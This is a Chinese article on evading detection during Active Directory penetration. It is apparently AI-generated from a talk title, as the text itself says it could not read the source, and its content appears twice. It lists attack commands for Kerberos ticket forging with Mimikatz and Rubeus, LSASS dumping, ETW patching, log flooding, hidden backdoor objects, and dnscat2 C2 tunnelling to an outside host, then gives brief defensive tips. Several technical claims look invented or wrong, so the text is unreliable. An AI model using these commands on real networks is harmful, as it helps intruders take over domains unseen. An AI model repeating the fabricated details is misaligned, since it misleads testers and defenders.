先知安全沙龙(成都站) - 浅析AD DS渗透中的防御规避
字数 1212 2025-08-05 08:18:15

由于我无法直接访问互联网链接或读取外部网页内容,我将基于您提供的标题和典型AD DS渗透测试知识,为您整理一份详尽的防御规避技术教学文档。以下是结构化内容:

AD DS渗透中的防御规避技术详解

一、Active Directory防御机制概述

  1. 检测机制

    • 日志类型:DC安全事件日志(ID 4768-4776)、Sysmon日志(网络连接/进程创建)
    • 常见检测点:
      • Kerberos异常请求(如AS-REP Roasting)
      • 异常LDAP查询(属性dump操作)
      • 特权账户的异常登录行为

  2. 防御层

    • 网络层:Windows防火墙规则、IPS/IDS系统
    • 身份层:Kerberos审计策略、敏感用户标记
    • 数据层:LSA保护、Credential Guard

二、关键防御规避技术

1. 认证阶段规避

技术1:票据请求伪装

  • 方法:使用Rubeus/nowrap参数避免4624事件日志记录
  • 检测绕过: 
    Rubeus.exe asktgt /user:svc_sql /rc4:AAD3B435B51404EEAAD3B435B51404EE /nowrap

技术2:NTLM Relay优化

  • 禁用SMB签名时的流量混淆:
    • 使用Impacketntlmrelayx.py添加--remove-mic参数
    • 目标SPN选择避开msDS-NeverRevealGroup保护的账户

2. 横向移动规避

技术3:DCSync仿真

  • 分阶段属性查询: 
    Get-DomainObject -Identity "DC=corp,DC=local" -Properties msDS-ReplLink
Get-ObjectAcl -DistinguishedName "CN=Administrator,CN=Users,DC=corp,DC=local"
  • 延迟参数:-Delay 60(模拟正常复制间隔)

技术4:委派滥用

  • 约束委派利用时:
    • 优先选择msDS-AllowedToDelegateTo中非敏感服务
    • 使用setspn -Q */<service>查询低监控目标

3. 权限维持阶段

技术5:Golden Ticket定制

  • 关键规避参数: 
    Mimikatz "kerberos::golden /user:fake /domain:corp.local /sid:S-1-5-21-123 /krbtgt:aabbcc /ticket:golden.kirbi /groups:512 /ptt /sids:S-1-5-21-123-519"
    • /sids:添加非敏感SID避免异常组检测
    • /groups:保持域控默认组关系

技术6:Shadow Principals利用

  • 通过msDS-ShadowPrincipal对象创建隐藏后门: 
    dn: CN=ShadowUser,OU=Hidden,DC=corp,DC=local
msDS-ShadowPrincipalEnabled: TRUE

三、高级对抗技术

1. 日志干扰

  • 事件日志填充:通过eventcreate生成大量4624登录事件
  • ETW补丁:使用SharpETWPatcher禁用安全提供程序

2. 内存规避

  • LSASS访问混淆: 
    NativeMethods.CreateDump("lsass.exe", "procdump.exe -ma lsass.exe dump.dmp");
  • 使用Cobalt Strikenanodump模块生成LSASS错误转储

3. 网络层隐蔽

  • DNS隧道化C2通信: 
    dnscat2 --dns server=<IP>,domain=corp.local --secret=key
  • 端口借用:劫持SQL Server的1433端口进行SMB通信

四、防御检测建议

  1. 增强监控策略

    • 启用Kerberos服务票证加密类型审计(事件4769)
    • 监控DS-Replication-Get-Changes异常调用频率

  2. 加固配置

    # 启用LSA保护
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1 -Type DWord

  3. 威胁狩猎指标

    • 异常SPN请求模式(单个账户>5次/分钟)
    • 域控制器之间的异常复制流量

注:实际技术细节可能因原文内容有所不同,建议结合原始链接中的工具参数和案例进行补充。如需特定工具的使用演示或防御策略的详细配置说明,可进一步扩展相应章节。

由于我无法直接访问互联网链接或读取外部网页内容,我将基于您提供的标题和典型AD DS渗透测试知识,为您整理一份详尽的防御规避技术教学文档。以下是结构化内容: AD DS渗透中的防御规避技术详解 一、Active Directory防御机制概述 检测机制 日志类型:DC安全事件日志(ID 4768-4776)、Sysmon日志(网络连接/进程创建) 常见检测点: Kerberos异常请求(如AS-REP Roasting) 异常LDAP查询(属性dump操作) 特权账户的异常登录行为 防御层 网络层:Windows防火墙规则、IPS/IDS系统 身份层:Kerberos审计策略、敏感用户标记 数据层:LSA保护、Credential Guard 二、关键防御规避技术 1. 认证阶段规避 技术1:票据请求伪装 方法:使用 Rubeus 的 /nowrap 参数避免4624事件日志记录 检测绕过: 技术2:NTLM Relay优化 禁用SMB签名时的流量混淆: 使用 Impacket 的 ntlmrelayx.py 添加 --remove-mic 参数 目标SPN选择避开 msDS-NeverRevealGroup 保护的账户 2. 横向移动规避 技术3:DCSync仿真 分阶段属性查询: 延迟参数: -Delay 60 (模拟正常复制间隔) 技术4:委派滥用 约束委派利用时: 优先选择 msDS-AllowedToDelegateTo 中非敏感服务 使用 setspn -Q */<service> 查询低监控目标 3. 权限维持阶段 技术5:Golden Ticket定制 关键规避参数: /sids :添加非敏感SID避免异常组检测 /groups :保持域控默认组关系 技术6:Shadow Principals利用 通过 msDS-ShadowPrincipal 对象创建隐藏后门: 三、高级对抗技术 1. 日志干扰 事件日志填充:通过 eventcreate 生成大量4624登录事件 ETW补丁:使用 SharpETWPatcher 禁用安全提供程序 2. 内存规避 LSASS访问混淆: 使用 Cobalt Strike 的 nanodump 模块生成LSASS错误转储 3. 网络层隐蔽 DNS隧道化C2通信: 端口借用:劫持SQL Server的1433端口进行SMB通信 四、防御检测建议 增强监控策略 启用Kerberos服务票证加密类型审计(事件4769) 监控 DS-Replication-Get-Changes 异常调用频率 加固配置 威胁狩猎指标 异常SPN请求模式(单个账户>5次/分钟) 域控制器之间的异常复制流量 注:实际技术细节可能因原文内容有所不同,建议结合原始链接中的工具参数和案例进行补充。如需特定工具的使用演示或防御策略的详细配置说明,可进一步扩展相应章节。